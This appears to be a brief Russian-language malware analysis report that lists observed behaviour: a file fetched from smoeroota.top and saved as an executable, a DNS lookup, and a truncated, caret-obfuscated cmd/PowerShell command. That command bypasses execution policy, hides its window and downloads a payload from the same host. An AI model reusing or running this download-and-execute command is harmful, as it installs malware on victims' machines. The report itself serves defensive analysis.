Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^Wer^ShElL^.^ex^e^ -^EXeC^Uti^ONP^Ol^I^c^Y^ ^byPass -NoPR^oFi^L^e -wi^nDOwst^YL^E^ HI^DD^en^ (nEW-Obj^EC^T ^s^Y^sTe^M^.N^Et.WEBCLien^t).DoWnlO^AdfILe^('http://smoeroota.to...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "P^o^Wer^ShElL^.^ex^e^ -^EXeC^Uti^ONP^Ol^I^c^Y^ ^byPass -NoPR^oFi^L^e -wi^nDOwst^YL^E^ HI^DD^en^ (nEW-Obj^EC^T ^s^Y^sTe^M^.N^Et.WEBCLien^t).DoWnlO^AdfILe^('http://smoeroota.to...' (со скрытым окном)